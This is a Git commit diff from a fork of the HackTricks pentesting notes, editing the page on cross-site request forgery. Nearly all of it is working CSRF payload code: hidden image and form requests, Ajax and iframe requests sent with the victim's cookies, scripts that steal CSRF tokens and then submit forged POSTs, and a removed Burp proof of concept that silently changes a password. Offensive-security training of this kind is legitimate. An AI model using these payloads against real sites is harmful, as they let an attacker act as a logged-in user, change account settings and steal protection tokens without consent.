coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] one page modified

Browse Source
This commit is contained in:
CPol 2021-06-05 01:10:15 +00:00 committed by gitbook-bot
parent 3822d83563
commit b491b5e008
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 27 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
pentesting-web/csrf-cross-site-request-forgery.md
View File

@ -113,7 +113,7 @@ https://hahwul.com/.white_domain_com (X)
If a **CSRF token** is being used as **defence** you could try to **ex-filtrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability. If a **CSRF token** is being used as **defence** you could try to **ex-filtrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
### **Make a GET request using** _**img**_ **tag** ### **GET using HTML tags**
```markup ```markup
<img src=http://google.es?param=VALUE style="display:none" /> <img src=http://google.es?param=VALUE style="display:none" />
@ -125,7 +125,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
![](../.gitbook/assets/image%20%28509%29.png) ![](../.gitbook/assets/image%20%28509%29.png)
### Make a GET request using a form ### Form GET request
```markup ```markup
<html> <html>
@ -143,7 +143,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
</html> </html>
``` ```
### Make a POST request using a form ### Form POST request
```markup ```markup
<html> <html>
@ -161,7 +161,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
</html> </html>
``` ```
### Make a POST request using a form without changing page ### Form POST request through iframe
```markup ```markup
<!-- <!--
@ -181,7 +181,7 @@ The request is sent through the iframe withuot reloading the page
</html> </html>
``` ```
### **Make a Post request using Ajax** ### **Ajax POST request**
```markup ```markup
<script> <script>
@ -194,13 +194,23 @@ else
{// code for IE6, IE5 {// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP"); xh=new ActiveXObject("Microsoft.XMLHTTP");
} }
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile"); xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this) xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on"); xh.send("username=abcd&status=on");
</script> </script>
<script>
//JQuery version
$.ajax({
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
})
</script>
``` ```
### POST request using multipart/form-data content type ### multipart/form-data POST request
```javascript ```javascript
myFormData = new FormData(); myFormData = new FormData();
@ -213,12 +223,13 @@ fetch("http://example/some/path", {
}); });
``` ```
### POST request using multipart/form-data content type x2 ### multipart/form-data POST request v2
```javascript ```javascript
var fileSize = fileData.length, var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC", boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true); xhr.open("POST", url, true);
// MIME POST request. // MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
@ -233,7 +244,7 @@ body += "--" + boundary + "--";
xhr.sendAsBinary(body); xhr.sendAsBinary(body);
``` ```
### **Make a Post request using a Form and Iframe in 2 separated files** ### Form POST request from within an iframe
```markup ```markup
<--! expl.html --> <--! expl.html -->
@ -253,12 +264,13 @@ function envia(){document.getElementById("formulario").submit();}
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1> <h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
``` ```
### **Get a CSRF Token and send a Post request \(x-www-form-urlencoded\) using Ajax** ### **Steal CSRF Token and send a POST request**
```javascript ```javascript
function submitFormWithTokenJS(token) { function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest(); var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true); xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;
// Send the proper header information along with the request // Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
@ -277,6 +289,7 @@ function getTokenJS() {
var xhr = new XMLHttpRequest(); var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document // This tels it to return it as a HTML document
xhr.responseType = "document"; xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous // true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true); xhr.open("GET", GET_URL, true);
xhr.onload = function (e) { xhr.onload = function (e) {
@ -300,7 +313,7 @@ var POST_URL="http://google.com?param=VALUE"
getTokenJS(); getTokenJS();
``` ```
### **Get a CSRF Token and send a Post request using an iframe, a form and Ajax** ### **Steal CSRF Token and send a Post request using an iframe, a form and Ajax**
```markup ```markup
<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data"> <form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
@ -322,7 +335,7 @@ function f1(){
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe> <iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
``` ```
### **Get a CSRF Token with an iframe and write inside the iframe a form a send it** ### **Steal CSRF Token and sen a POST request using an iframe and a form**
```markup ```markup
<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe> <iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>
@ -342,7 +355,7 @@ function read()
</script> </script>
``` ```
### **Use 2 iframes: get the token with one and send the post request with the other** ### **Steal token and send it using 2 iframes**
```markup ```markup
<script> <script>
@ -374,7 +387,7 @@ height="600" width="800"></iframe>
</form> </form>
``` ```
### **Get a CSRF token with Ajax and send a post with a form** ### **POSTSteal CSRF token with Ajax and send a post with a form**
```markup ```markup
<body onload="getData()"> <body onload="getData()">
@ -389,6 +402,7 @@ height="600" width="800"></iframe>
<script> <script>
var x = new XMLHttpRequest(); var x = new XMLHttpRequest();
function getData() { function getData() {
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true); x.open("GET","http://google.com?param=VALUE",true);
x.send(null); x.send(null);
} }
@ -425,26 +439,6 @@ socket.on('connect', () => {
</script> </script>
``` ```
### Make POST Form request invisible with invisible Iframe
```markup
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form action="https://example.com/admin/changepassword" method="POST" style="display:none" target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible" >
<input type="hidden" name="password" value="hacktricks" />
<input type="hidden" name="password2" value="hacktricks" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
## CSRF Login Brute Force ## CSRF Login Brute Force
The code can be used to Brut Force a login form using a CSRF token \(It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting\): The code can be used to Brut Force a login form using a CSRF token \(It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting\):